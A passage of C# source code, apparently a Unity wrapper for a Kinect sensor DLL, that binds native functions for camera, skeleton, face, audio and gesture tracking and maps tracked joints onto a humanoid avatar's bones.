FacePointType_Nose= 2,\n FacePointType_MouthCornerLeft= 3,\n FacePointType_MouthCornerRight= 4,\n FacePointType_Count= ( FacePointType_MouthCornerRight + 1 ) ,\n // a_FaceProperty\n FaceProperty_Happy= 0,\n FaceProperty_Engaged= 1,\n FaceProperty_WearingGlasses= 2,\n FaceProperty_LeftEyeClosed= 3,\n FaceProperty_RightEyeClosed= 4,\n FaceProperty_MouthOpen= 5,\n FaceProperty_MouthMoved= 6,\n FaceProperty_LookingAway= 7,\n FaceProperty_Count= ( FaceProperty_LookingAway + 1 ) ,\n // FaceDetectionResult\n DetectionResult_Unknown= 0,\n DetectionResult_No= 1,\n DetectionResult_Maybe= 2,\n DetectionResult_Yes= 3,\n // HDFace\n HDFaceVerticesSize = 1347,\n // dummy\n NtKinectdummy = 0;\n\n [DllImport (\"NtKinectDLL\")] private static extern IntPtr getKinect();\n [DllImport (\"NtKinectDLL\")] private static extern void stopKinect(IntPtr ptr);\n\n // OpenCV\n [DllImport (\"NtKinectDLL\")] private static extern void imshow(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern void imshowBlack(IntPtr ptr);\n\n // CoordinateMapper\n [DllImport (\"NtKinectDLL\")] private static extern void mapCameraPointToColorSpace(IntPtr ptr,IntPtr sv,IntPtr cv,int n);\n [DllImport (\"NtKinectDLL\")] private static extern void mapCameraPointToDepthSpace(IntPtr ptr,IntPtr sv,IntPtr dv,int n);\n [DllImport (\"NtKinectDLL\")] private static extern void mapDepthPointToColorSpace(IntPtr ptr,IntPtr dv,IntPtr dth,IntPtr cv,int n);\n [DllImport (\"NtKinectDLL\")] private static extern void mapDepthPointToCameraSpace(IntPtr ptr,IntPtr dv,IntPtr dth,IntPtr sv,int n);\n\n // Multi Thread\n [DllImport (\"NtKinectDLL\")] private static extern void acquire(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern void release(IntPtr ptr);\n\n // Audio\n [DllImport (\"NtKinectDLL\")] private static extern void setAudio(IntPtr ptr, bool flag);\n [DllImport (\"NtKinectDLL\")] private static extern float getBeamAngle(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern float getBeamAngleConfidence(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern ulong getAudioTrackingId(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern void openAudio(IntPtr ptr, IntPtr filename);\n [DllImport (\"NtKinectDLL\")] private static extern void closeAudio(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern bool isOpenedAudio(IntPtr ptr);\n\n // RGB\n [DllImport (\"NtKinectDLL\")] private static extern void setRGB(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getRGB(IntPtr ptr, IntPtr data);\n\n // Depth\n [DllImport (\"NtKinectDLL\")] private static extern void setDepth(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getDepth(IntPtr ptr, IntPtr data);\n\n // Infrared\n [DllImport (\"NtKinectDLL\")] private static extern void setInfrared(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getInfrared(IntPtr ptr, IntPtr data);\n\n // BodyIndex\n [DllImport (\"NtKinectDLL\")] private static extern void setBodyIndex(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getBodyIndex(IntPtr ptr, IntPtr data);\n \n // Skeleton\n [DllImport (\"NtKinectDLL\")] private static extern void setSkeleton(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getSkeleton(IntPtr ptr, IntPtr skelton, IntPtr state, IntPtr id, IntPtr tid);\n [DllImport (\"NtKinectDLL\")] private static extern int handState(IntPtr ptr,int id,bool isLeft);\n \n // Face\n [DllImport (\"NtKinectDLL\")] private static extern void setFace(IntPtr ptr, bool isColorSpace);\n [DllImport (\"NtKinectDLL\")] private static extern int getFace(IntPtr ptr, IntPtr point,IntPtr rect,IntPtr direction,IntPtr property,IntPtr tid);\n\n // HDFace\n [DllImport (\"NtKinectDLL\")] private static extern void setHDFace(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getHDFace(IntPtr ptr, IntPtr point, IntPtr tid, IntPtr status);\n \n // Gesture\n [DllImport (\"NtKinectDLL\")] private static extern void setGestureFile(IntPtr ptr, IntPtr filename);\n [DllImport (\"NtKinectDLL\")] private static extern int setGestureId(IntPtr ptr, IntPtr name, int id); // id: non-zero\n [DllImport (\"NtKinectDLL\")] private static extern void setGesture(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern int getDiscreteGesture(IntPtr ptr, IntPtr gid, IntPtr confidence, IntPtr tid);\n [DllImport (\"NtKinectDLL\")] private static extern int getContinuousGesture(IntPtr ptr, IntPtr gid, IntPtr progress, IntPtr tid);\n [DllImport (\"NtKinectDLL\")] private static extern int getGidMapSize();\n\n // Video\n [DllImport (\"NtKinectDLL\")] private static extern void openVideo(IntPtr ptr, IntPtr filename);\n [DllImport (\"NtKinectDLL\")] private static extern void writeVideo(IntPtr ptr);\n [DllImport (\"NtKinectDLL\")] private static extern void closeVideo(IntPtr ptr);\n \n private IntPtr kinect;\n //public Vector3[] joint = new Vector3[jointCount];\n //public int[] jointState = new int[jointCount];\n\n // audio\n public float beamAngle;\n public float beamAngleConfidence;\n public ulong audioTrackingId;\n // images\n public Color32[] rgbImage;\n public ushort[] depthImage;\n public ushort[] infraredImage;\n public byte[] bodyIndexImage;\n // skeleton\n public List<List<Vector3>> skeleton;\n public List<List<int>> skeletonState;\n public List<int> skeletonId;\n public List<ulong> skeletonTrackingId;\n // skeleton (internal)\n private float[] skel;\n private int[] skelState;\n private int[] skelId;\n private ulong[] skelTrackingId;\n // face\n public List<List<Vector2>> facePoint;\n public List<Vector4> faceRect;\n public List<Vector3> faceDirection;\n public List<List<int>> faceProperty;\n public List<ulong> faceTrackingId;\n // face (internal)\n private float[] fcPoint;\n private float[] fcRect;\n private float[] fcDirection;\n private int[] fcProperty;\n private ulong[] fcTrackingId;\n // hdface\n public List<List<Vector3>> hdfacePoint;\n public List<ulong> hdfaceTrackingId;\n public List<int> hdfaceStatus;\n // hdface (internal)\n private float[] hdfcPoint;\n private ulong[] hdfcTrackingId;\n private int[] hdfcStatus;\n // gesture\n public List<int> discreteGesture;\n public List<float> gestureConfidence;\n public List<ulong> discreteGestureTrackingId;\n public List<int> continuousGesture;\n public List<float> gestureProgress;\n public List<ulong> continuousGestureTrackingId;\n // gesture (internal)\n private int[] gstId;\n private float[] gstFloat;\n private ulong[] gstTrackingId;\n \n public Kinect() {\n kinect = getKinect();\n //rgbImage = new byte[rgbRows * rgbCols * 4];\n rgbImage = new Color32[rgbRows * rgbCols];\n depthImage = new ushort[depthRows * depthCols];\n infraredImage = new ushort[depthRows * depthCols];\n bodyIndexImage = new byte[depthRows * depthCols];\n skeleton = new List<List<Vector3>>();\n skeletonState = new List<List<int>>();\n skeletonId = new List<int>();\n skeletonTrackingId = new List<ulong>();\n skel = new float[bodyCount * jointCount * 3];\n skelState = new int[bodyCount * jointCount];\n skelId = new int[bodyCount];\n skelTrackingId = new ulong[bodyCount];\n facePoint = new List<List<Vector2>>();\n faceRect = new List<Vector4>();\n faceDirection = new List<Vector3>();\n faceProperty = new List<List<int>>();\n faceTrackingId = new List<ulong>();\n fcPoint = new float[bodyCount * FacePointType_Count * 3];\n fcRect = new float[bodyCount * 4];\n fcDirection = new float[bodyCount * 3];\n fcProperty = new int[bodyCount * FaceProperty_Count];\n fcTrackingId = new ulong[bodyCount];\n hdfacePoint = new List<List<Vector3>>();\n hdfaceTrackingId = new List<ulong>();\n hdfaceStatus = new List<int>();\n hdfcPoint = new float[bodyCount * HDFaceVerticesSize * 3];\n hdfcTrackingId = new ulong[bodyCount];\n hdfcStatus = new int[bodyCount * 2];\n discreteGesture = new List<int>();\n gestureConfidence = new List<float>();\n discreteGestureTrackingId = new List<ulong>();\n continuousGesture = new List<int>();\n gestureProgress = new List<float>();\n continuousGestureTrackingId = new List<ulong>();\n gstId = new int[bodyCount * 100];\n gstFloat = new float[bodyCount * 100];\n gstTrackingId = new ulong[bodyCount * 100];\n }\n public void stopKinect() { stopKinect(kinect); }\n\n // OpenCV\n public void imshow() { imshow(kinect); }\n public void imshowBlack() { imshowBlack(kinect); }\n \n // coordinateMapper\n public void mapCameraPointToColorSpace(List<Vector3> skel,ref List<Vector2> color,int n) {\n float[] sv = new float[n * 3];\n float[] cv = new float[n * 2];\n for (int i=0; i<n; i++) {\n\tsv[3*i] = skel[i].x; sv[3*i+1] = skel[i].y; sv[3*i+2] = skel[i].z;\n }\n GCHandle gch = GCHandle.Alloc(sv,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(cv,GCHandleType.Pinned);\n mapCameraPointToColorSpace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),n);\n gch.Free();\n gch2.Free();\n color.Clear();\n for (int i=0; i<n; i++) {\n\tcolor.Add(new Vector2(cv[2*i],cv[2*i+1]));\n }\n }\n public void mapCameraPointToDepthSpace(List<Vector3> skel, ref List<Vector2> depth, int n) {\n float[] sv = new float[n * 3];\n float[] dv = new float[n * 2];\n for (int i=0; i<n; i++) {\n\tsv[3*i] = skel[i].x; sv[3*i+1] = skel[i].y; sv[3*i+2] = skel[i].z;\n }\n GCHandle gch = GCHandle.Alloc(sv,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(dv,GCHandleType.Pinned);\n mapCameraPointToDepthSpace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(), n);\n gch.Free();\n gch2.Free();\n depth.Clear();\n for (int i=0; i<n; i++) {\n\tdepth.Add(new Vector2(dv[2*i],dv[2*i+1]));\n }\n }\n public void mapDepthPointToColorSpace(List<Vector2> depth,ushort[] dth,ref List<Vector2> color,int n) {\n float[] dv = new float[n * 2];\n float[] cv = new float[n * 2];\n for (int i=0; i<n; i++) {\n\tdv[2*i] = depth[i].x; dv[2*i+1] = depth[i].y;\n }\n GCHandle gch = GCHandle.Alloc(dv,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(dth,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(cv,GCHandleType.Pinned);\n mapDepthPointToColorSpace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject(), n);\n gch.Free();\n gch2.Free();\n gch3.Free();\n color.Clear();\n for (int i=0; i<n; i++) {\n\tcolor.Add(new Vector2(cv[2*i],dv[2*i+1]));\n }\n }\n void mapDepthPointToCameraSpace(List<Vector2> depth,ushort[] dth,ref List<Vector3> skel,int n) {\n float[] dv = new float[n * 2];\n float[] sv = new float[n * 3];\n for (int i=0; i<n; i++) {\n\tdv[2*i] = depth[i].x; dv[2*i+1] = depth[i].y;\n }\n GCHandle gch = GCHandle.Alloc(dv,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(dth,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(sv,GCHandleType.Pinned);\n mapDepthPointToCameraSpace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject(),n);\n gch.Free();\n gch2.Free();\n gch3.Free();\n skel.Clear();\n for (int i=0; i<n; i++) {\n\tskel.Add(new Vector3(sv[3*i],sv[3*i+1],sv[3*i+2]));\n }\n }\n\n // Multi Thread\n public void acquire() { acquire(kinect); }\n public void release() { release(kinect); }\n // Audio\n public void setAudio(bool flag) {\n setAudio(kinect,flag);\n beamAngle = getBeamAngle(kinect);\n beamAngleConfidence = getBeamAngleConfidence(kinect);\n audioTrackingId = getAudioTrackingId(kinect);\n }\n /*\n public float getBeamAngle() { return getBeamAngle(kinect); }\n public float getBeamAngleConfidence() { return getBeamAngleConfidence(kinect); }\n */\n public void openAudio(string filename) {\n System.IntPtr fname = Marshal.StringToHGlobalUni(filename);\n openAudio(kinect,fname);\n Marshal.FreeHGlobal(fname);\n }\n public void closeAudio() { closeAudio(kinect); }\n public bool isOpenedAudio() { return isOpenedAudio(kinect); }\n // RGB\n public void setRGB() { setRGB(kinect); getRGB2(); }\n public int getRGB2() {\n GCHandle gch = GCHandle.Alloc(rgbImage,GCHandleType.Pinned);\n int n = getRGB(kinect,gch.AddrOfPinnedObject());\n gch.Free();\n return n;\n }\n\n // Depth\n public void setDepth() { setDepth(kinect); getDepth(); }\n public int getDepth() {\n GCHandle gch = GCHandle.Alloc(depthImage,GCHandleType.Pinned);\n int n = getDepth(kinect,gch.AddrOfPinnedObject());\n gch.Free();\n return n;\n }\n\n // Infrared\n public void setInfrared() { setInfrared(kinect); getInfrared(); }\n public int getInfrared() {\n GCHandle gch = GCHandle.Alloc(infraredImage,GCHandleType.Pinned);\n int n = getInfrared(kinect,gch.AddrOfPinnedObject());\n gch.Free();\n return n;\n }\n\n // BodyIndex\n public void setBodyIndex() {setBodyIndex(kinect); getBodyIndex(); }\n public int getBodyIndex() {\n GCHandle gch = GCHandle.Alloc(bodyIndexImage,GCHandleType.Pinned);\n int n = getBodyIndex(kinect,gch.AddrOfPinnedObject());\n gch.Free();\n return n;\n }\n\n // Skeleton\n public void setSkeleton() { setSkeleton(kinect); getSkeleton(); }\n public int getSkeleton() {\n GCHandle gch = GCHandle.Alloc(skel,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(skelState,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(skelId,GCHandleType.Pinned);\n GCHandle gch4 = GCHandle.Alloc(skelTrackingId,GCHandleType.Pinned);\n int n = getSkeleton(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject(),gch4.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n gch4.Free();\n skeleton.Clear(); skeletonState.Clear(); skeletonId.Clear(); skeletonTrackingId.Clear();\n int idx = 0, st=0;\n for (int i=0; i<n; i++) {\n\tskeleton.Add(new List<Vector3>());\n\tskeletonState.Add(new List<int>());\n\tfor (int j=0; j<jointCount; j++) {\n\t skeleton[i].Add(new Vector3(skel[idx++], skel[idx++], skel[idx++]));\n\t skeletonState[i].Add(skelState[st++]);\n\t}\n\tskeletonId.Add(skelId[i]);\n\tskeletonTrackingId.Add(skelTrackingId[i]);\n }\n return n;\n }\n\n private int faceFailCount = 0;\n // Face\n public void setFace() { setFace(kinect,true); getFace(); }\n public int getFace() {\n GCHandle gch = GCHandle.Alloc(fcPoint,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(fcRect,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(fcDirection,GCHandleType.Pinned);\n GCHandle gch4 = GCHandle.Alloc(fcProperty,GCHandleType.Pinned);\n GCHandle gch5 = GCHandle.Alloc(fcTrackingId,GCHandleType.Pinned);\n int n = getFace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject(),gch4.AddrOfPinnedObject(),gch5.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n gch4.Free();\n gch5.Free();\n if (n == 0) {\n\tfaceFailCount++;\n\tif (faceFailCount < 10) {\n\t return 0;\n\t} else {\n\t faceFailCount = 0;\n\t}\n }\n facePoint.Clear(); faceRect.Clear(); faceDirection.Clear(); faceProperty.Clear(); faceTrackingId.Clear();\n int idx=0, ridx=0, didx=0, pidx = 0;\n for (int i=0; i<n; i++) {\n\tfacePoint.Add(new List<Vector2>());\n\tfor (int j=0; j<FacePointType_Count; j++) {\n\t facePoint[i].Add(new Vector2(fcPoint[idx++],fcPoint[idx++]));\n\t}\n\tfaceRect.Add(new Vector4(fcRect[ridx++],fcRect[ridx++],fcRect[ridx++],fcRect[ridx++]));\n\tfaceDirection.Add(new Vector3(fcDirection[didx++],fcDirection[didx++],fcDirection[didx++]));\n\tfaceProperty.Add(new List<int>());\n\tfor (int j=0; j<FaceProperty_Count; j++) {\n\t faceProperty[i].Add(fcProperty[pidx++]);\n\t}\n\tfaceTrackingId.Add(fcTrackingId[i]);\n }\n return n;\n }\n public Vector3 getFaceDirectionByTrackingId(ulong tid) {\n for (int i=0; i<faceTrackingId.Count; i++) {\n\tif (faceTrackingId[i] == tid) {\n\t return faceDirection[i];\n\t}\n }\n return Vector3.zero;\n }\n\n // HDFace\n public void setHDFace() { setHDFace(kinect); getHDFace(); }\n public int getHDFace() {\n GCHandle gch = GCHandle.Alloc(hdfcPoint,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(hdfcTrackingId,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(hdfcStatus,GCHandleType.Pinned);\n int n = getHDFace(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n hdfacePoint.Clear(); hdfaceTrackingId.Clear(); hdfaceStatus.Clear();\n int idx = 0;\n for (int i=0; i<n; i++) {\n\thdfacePoint.Add(new List<Vector3>());\n\tfor (int j=0; j < HDFaceVerticesSize; j++) {\n\t hdfacePoint[i].Add(new Vector3(hdfcPoint[idx++],hdfcPoint[idx++],hdfcPoint[idx++]));\n\t}\n\thdfaceTrackingId.Add(hdfcTrackingId[i]);\n\thdfaceStatus.Add(hdfcStatus[i]);\n }\n return n;\n }\n\n // Gesture\n public void setGestureFile(string filename) {\n IntPtr gbd = Marshal.StringToHGlobalUni(filename);\n setGestureFile(kinect,gbd);\n Marshal.FreeHGlobal(gbd);\n }\n public int setGestureId(string name, int id) {\n System.IntPtr g = Marshal.StringToHGlobalUni(name); // discrete\n int n = setGestureId(kinect,g,id);\n Marshal.FreeHGlobal(g);\n return n;\n }\n public void setGesture() { setGesture(kinect); }\n public int getDiscreteGesture() {\n int size = bodyCount * getGidMapSize();\n if (gstId.Length < size) {\n\tgstId = new int[size];\n\tgstFloat = new float[size];\n\tgstTrackingId = new ulong[size];\n }\n GCHandle gch = GCHandle.Alloc(gstId,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(gstFloat,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(gstTrackingId,GCHandleType.Pinned);\n int n = getDiscreteGesture(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n discreteGesture.Clear(); gestureConfidence.Clear(); discreteGestureTrackingId.Clear();\n for (int i=0; i<n; i++) {\n\tdiscreteGesture.Add(gstId[i]);\n\tgestureConfidence.Add(gstFloat[i]);\n\tdiscreteGestureTrackingId.Add(gstTrackingId[i]);\n }\n return n;\n }\n public int getContinuousGesture() {\n int size = bodyCount * getGidMapSize();\n if (gstId.Length < size) {\n\tgstId = new int[size];\n\tgstFloat = new float[size];\n\tgstTrackingId = new ulong[size];\n }\n GCHandle gch = GCHandle.Alloc(gstId,GCHandleType.Pinned);\n GCHandle gch2 = GCHandle.Alloc(gstFloat,GCHandleType.Pinned);\n GCHandle gch3 = GCHandle.Alloc(gstTrackingId,GCHandleType.Pinned);\n int n = getContinuousGesture(kinect,gch.AddrOfPinnedObject(),gch2.AddrOfPinnedObject(),gch3.AddrOfPinnedObject());\n gch.Free();\n gch2.Free();\n gch3.Free();\n continuousGesture.Clear(); gestureProgress.Clear(); continuousGestureTrackingId.Clear();\n for (int i=0; i<n; i++) {\n\tcontinuousGesture.Add(gstId[i]);\n\tgestureProgress.Add(gstFloat[i]);\n\tcontinuousGestureTrackingId.Add(gstTrackingId[i]);\n }\n return n;\n }\n // Video\n public void openVideo(string filename) {\n IntPtr str = Marshal.StringToHGlobalUni(filename);\n openVideo(kinect,str);\n Marshal.FreeHGlobal(str);\n }\n public void writeVideo() { writeVideo(kinect); }\n public void closeVideo() { closeVideo(kinect); }\n }\n public class RigBone {\n public GameObject gameObject;\n public HumanBodyBones bone;\n public bool isValid;\n public Transform transform {\n get { return animator.GetBoneTransform(bone); }\n }\n Animator animator;\n Quaternion savedLocalRotation;\n Quaternion savedRotation;\n public RigBone(GameObject g, HumanBodyBones b) {\n gameObject = g;\n bone = b;\n isValid = false;\n animator = gameObject.GetComponent<Animator>();\n if (animator == null) {\n\tDebug.Log(\"no Animator Component\");\n\treturn;\n }\n Avatar avatar = animator.avatar;\n if (avatar == null || !avatar.isHuman || !avatar.isValid) {\n\tDebug.Log(\"Avatar is not Humanoid or it is not valid\");\n\treturn;\n }\n if (animator.GetBoneTransform(bone) == null) {\n\tDebug.Log(\"bone \" + bone + \" is note assigned in \"+g);\n\treturn;\n }\n isValid = true;\n savedLocalRotation = animator.GetBoneTransform(bone).localRotation;\n savedRotation = animator.GetBoneTransform(bone).rotation;\n }\n public void set(float a, float x, float y, float z) {\n set(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void set(Quaternion q) {\n animator.GetBoneTransform(bone).localRotation = q;\n savedLocalRotation = q;\n }\n public void mul(float a, float x, float y, float z) {\n mul(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void mul(Quaternion q) {\n Transform tr = animator.GetBoneTransform(bone);\n tr.localRotation = q * tr.localRotation;\n }\n public void offset(float a, float x, float y, float z) {\n offset(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void offset(Quaternion q) {\n animator.GetBoneTransform(bone).localRotation = q * savedLocalRotation;\n }\n public void gset(float a, float x, float y, float z) {\n gset(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void gset(Quaternion q) {\n animator.GetBoneTransform(bone).rotation = q;\n savedLocalRotation = q;\n }\n public void gmul(float a, float x, float y, float z) {\n gmul(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void gmul(Quaternion q) {\n Transform tr = animator.GetBoneTransform(bone);\n tr.rotation = q * tr.rotation;\n }\n public void goffset(float a, float x, float y, float z) {\n goffset(Quaternion.AngleAxis(a, new Vector3(x,y,z)));\n }\n public void goffset(Quaternion q) {\n animator.GetBoneTransform(bone).rotation = q * savedRotation;\n }\n public void changeBone(HumanBodyBones b) {\n bone = b;\n savedLocalRotation = animator.GetBoneTransform(bone).localRotation;\n savedRotation = animator.GetBoneTransform(bone).rotation;\n }\n }\n\n class HumanoidSkeleton {\n protected static int[] jointSegment = new int[] {\n Kinect.JointType_SpineBase, Kinect.JointType_SpineMid, // Spine\n Kinect.JointType_Neck, Kinect.JointType_Head, // Neck\n // left\n Kinect.JointType_ShoulderLeft, Kinect.JointType_ElbowLeft, // LeftUpperArm\n Kinect.JointType_ElbowLeft, Kinect.JointType_WristLeft, // LeftLowerArm\n Kinect.JointType_WristLeft, Kinect.JointType_HandLeft, // LeftHand\n Kinect.JointType_HipLeft, Kinect.JointType_KneeLeft, // LeftUpperLeg\n Kinect.JointType_KneeLeft, Kinect.JointType_AnkleLeft, // LeftLowerLeg6\n Kinect.JointType_AnkleLeft, Kinect.JointType_FootLeft, // LeftFoot\n // right\n Kinect.JointType_ShoulderRight, Kinect.JointType_ElbowRight, // RightUpperArm\n Kinect.JointType_ElbowRight, Kinect.JointType_WristRight, // RightLowerArm\n Kinect.JointType_WristRight, Kinect.JointType_HandRight, // RightHand\n Kinect.JointType_HipRight, Kinect.JointType_KneeRight, // RightUpperLeg\n Kinect.JointType_KneeRight, Kinect.JointType_AnkleRight, // RightLowerLeg\n Kinect.JointType_AnkleRight, Kinect.JointType_FootRight, // RightFoot\n };\n public Vector3[] joint = new Vector3[Kinect.jointCount];\n public int[] jointState = new int[Kinect.jointCount];\n\n protected Dictionary<HumanBodyBones,Vector3> trackingSegment = null;\n protected Dictionary<HumanBodyBones, int> trackingState = null;\n\n protected static HumanBodyBones[] humanBone = new HumanBodyBones[] {\n HumanBodyBones.Hips,\n HumanBodyBones.Spine,\n HumanBodyBones.Chest,\n HumanBodyBones.Neck,\n HumanBodyBones.Head,\n HumanBodyBones.LeftUpperArm,\n HumanBodyBones.LeftLowerArm,\n HumanBodyBones.LeftHand,\n HumanBodyBones.LeftUpperLeg,\n HumanBodyBones.LeftLowerLeg,\n HumanBodyBones.LeftFoot,\n HumanBodyBones.RightUpperArm,\n HumanBodyBones.RightLowerArm,\n HumanBodyBones.RightHand,\n HumanBodyBones.RightUpperLeg,\n HumanBodyBones.RightLowerLeg,\n HumanBodyBones.RightFoot,\n };\n\n protected static HumanBodyBones[] targetBone = new HumanBodyBones[] {\n HumanBodyBones.Spine,\n HumanBodyBones.Neck,\n HumanBodyBones.LeftUpperArm,\n HumanBodyBones.LeftLowerArm,\n HumanBodyBones.LeftHand,\n HumanBodyBones.LeftUpperLeg,\n HumanBodyBones.LeftLowerLeg,\n HumanBodyBones.LeftFoot,\n HumanBodyBones.RightUpperArm,\n HumanBodyBones.RightLowerArm,\n HumanBodyBones.RightHand,\n HumanBodyBones.RightUpperLeg,\n HumanBodyBones.RightLowerLeg,\n HumanBodyBones.RightFoot,\n };\n\n public GameObject humanoid;\n protected Dictionary<HumanBodyBones, RigBone> rigBone = null;\n protected bool isSavedPosition = false;\n protected Vector3 savedPosition;\n protected Quaternion savedHumanoidRotation;\n\n public HumanoidSkeleton(GameObject h) {\n humanoid = h;\n rigBone = new Dictionary<HumanBodyBones, RigBone>();\n foreach (HumanBodyBones bone in humanBone) {\n\trigBone[bone] = new RigBone(humanoid,bone);\n }\n savedHumanoidRotation = humanoid.transform.rotation;\n trackingSegment = new Dictionary<HumanBodyBones,Vector3>(targetBone.Length);\n trackingState = new Dictionary<HumanBodyBones, int>(targetBone.Length);\n }\n protected void swapJoint(int a, int b) {\n Vector3 tmp = joint[a]; joint[a] = joint[b]; joint[b] = tmp;\n int t = jointState[a]; jointState[a] = jointState[b]; jointState[b] = t;\n }\n public void set(Kinect kinect, int n, bool mirrored = false, bool move=false, bool headMove=true) {\n Vector3 faceDir = kinect.getFaceDirectionByTrackingId(kinect.skeletonTrackingId[n]);\n if (isSavedPosition == false\n\t && kinect.skeletonState[n][Kinect.JointType_SpineBase] != Kinect.TrackingState_NotTracked) {\n\tisSavedPosition = true;\n\tsavedPosition = kinect.skeleton[n][Kinect.JointType_SpineBase];\n }\n for (int i=0; i<kinect.skeleton[n].Count; i++) {\n\tVector3 jt = kinect.skeleton[n][i];\n\tif (mirrored) {\n\t joint[i] = new Vector3(-jt.x, jt.y, -jt.z);\n\t} else {\n\t joint[i] = new Vector3(jt.x, jt.y, savedPosition.z*2 - jt.z);\n\t}\n\tjointState[i] = kinect.skeletonState[n][i];\n }\n if (mirrored) {\n\tswapJoint(Kinect.JointType_ShoulderLeft, Kinect.JointType_ShoulderRight);\n\tswapJoint(Kinect.JointType_ElbowLeft, Kinect.JointType_ElbowRight);\n\tswapJoint(Kinect.JointType_WristLeft, Kinect.JointType_WristRight);\n\tswapJoint(Kinect.JointType_HandLeft, Kinect.JointType_HandRight);\n\tswapJoint(Kinect.JointType_HipLeft, Kinect.JointType_HipRight);\n\tswapJoint(Kinect.JointType_KneeLeft, Kinect.JointType_KneeRight);\n\tswapJoint(Kinect.JointType_AnkleLeft, Kinect.JointType_AnkleRight);\n\tswapJoint(Kinect.JointType_FootLeft, Kinect.JointType_FootRight);\n\tswapJoint(Kinect.JointType_HandTipLeft, Kinect.JointType_HandTipRight);\n\tswapJoint(Kinect.JointType_ThumbLeft, Kinect.JointType_ThumbRight);\n }\n for (int i=0; i<targetBone.Length; i++) {\n\tint s = jointSegment[2*i], e = jointSegment[2*i+1];\n\ttrackingSegment[targetBone[i]] = joint[e] - joint[s];\n\ttrackingState[targetBone[i]] = System.Math.Min(jointState[e],jointState[s]);\n }\n\n Vector3 waist = joint[Kinect.JointType_HipRight] - joint[Kinect.JointType_HipLeft];\n waist = new Vector3(waist.x, 0, waist.z);\n Quaternion rot = Quaternion.FromToRotation(Vector3.right,waist);\n Quaternion rotInv = Quaternion.Inverse(rot);\n \n Vector3 shoulder = joint[Kinect.JointType_ShoulderRight] - joint[Kinect.JointType_ShoulderLeft];\n shoulder = new Vector3(shoulder.x, 0, shoulder.z);\n //Quaternion srot = Quaternion.FromToRotation(Vector3.right,shoulder);\n //Quaternion srotInv = Quaternion.Inverse(srot);\n\n humanoid.transform.rotation = Quaternion.identity;\n //humanoid.transform.rotation = savedHumanoidRotation;\n foreach (HumanBodyBones bone in targetBone) {\n\tif (rigBone[bone].isValid && trackingState[bone] != Kinect.TrackingState_NotTracked) {\n\t rigBone[bone].transform.rotation = rotInv * Quaternion.FromToRotation(Vector3.up,trackingSegment[bone]);\n\t}\n }\n //rigBone[HumanBodyBones.Chest].offset(srot);\n if (headMove && faceDir.magnitude > 1e-6) {\n\tfloat pitch = faceDir.x, yaw = faceDir.y, roll = faceDir.z;\n\tif (mirrored) {\n\t pitch = -pitch;\n\t roll = -roll;\n\t} else {\n\t pitch = -pitch;\n\t yaw = -yaw;\n\t}\n\trigBone[HumanBodyBones.Head].transform.rotation = Util.toQ(pitch, yaw, roll);\n }\n Quaternion bodyRot = rot;\n if (mirrored) {\n\tbodyRot = Quaternion.AngleAxis(180,Vector3.up) * bodyRot;\n }\n humanoid.transform.rotation = bodyRot;\n if (move == true) {\n\tVector3 m = joint[Kinect.JointType_SpineBase];\n\tif (mirrored) m = new Vector3(-m.x, m.y, -m.z);\n\thumanoid.transform.position = m;\n }\n }\n }\n class Util {\n public static Quaternion toQ (float pitch, float yaw, float roll) {\n yaw *= Mathf.Deg2Rad;\n pitch *= Mathf.Deg2Rad;\n roll *= Mathf.Deg2Rad;\n float rollOver2 = roll * 0.5f;\n float sinRollOver2 = (float)System.Math.Sin ((double)rollOver2);\n float cosRollOver2 = (float)System.Math.Cos ((double)rollOver2);\n float pitchOver2 = pitch * 0.5f;\n float 